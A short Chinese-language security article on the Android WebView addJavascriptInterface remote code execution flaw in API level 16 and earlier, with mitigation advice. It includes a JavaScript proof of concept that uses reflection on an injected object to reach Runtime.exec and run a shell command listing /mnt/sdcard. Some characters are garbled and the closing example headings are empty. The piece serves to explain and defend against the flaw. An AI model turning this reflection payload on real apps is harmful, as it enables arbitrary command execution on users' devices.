Android API level 16以及之前的版本存在遠程代碼執(zhí)行安全漏洞，該漏洞源于程序使用WebView.addJavascriptInterface可以實現(xiàn)網(wǎng)頁JS與本地JAVA的交互，但是沒有限制已注冊JAVA類的方法調(diào)用，類中的任何public函數(shù)都可以在JS代碼中訪問，這就導致可以調(diào)用getClass通過java反射機制來執(zhí)行任意Java對象的方法。

例如：利用addJavascriptInterface方法注冊可供JavaScript調(diào)用的java對象“injectedObj”，利用反射機制調(diào)用Android API getRuntime執(zhí)行shell命令：

java代碼：

WebView webView1 = (WebView)findViewById(R.id.webView1);

JavaScriptInterface myJavaScriptInterface = new JavaScriptInterface();

webView1.addJavascriptInterface(myJavaScriptInterface,"injectedObj");

webView1.loadUrl("http://www.example.com");

js代碼：

<html>

<body>

<script>

function execute(cmdArgs) {

return injectedObj.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

var res = execute(["/system/bin/sh", "-c", "ls -al /mnt/sdcard/"]);

document.write(getContents(res.getInputStream()));

</script>

</body>

</html>

? ? 建議有以下幾種方法可以避免這種情況的發(fā)生

? ??????（1）避免調(diào)用addJavascriptInterface()方法，或者將API等級設為17或者更高級別，對于這些API等級，只有被標注了JavascriptInterface的公共方法才可以從JavaScript訪問。

（2）webview組件會默認內(nèi)置一個searchBoxJavaBridge_接口，故需要使用removeJavascriptInterface移除searchBoxJavaBridge_。

（3）調(diào)用了Android/webkit/AccessibilityInjector組件的應用在開啟輔助功能選項中第三方服務的安卓系統(tǒng)會默認添加accessibility和accessibilityTraversal接口，同樣需要使用removeJavascriptInterface進行移除。

? 廢話不多說? 直接上代碼示例

示例1

實例2

? ?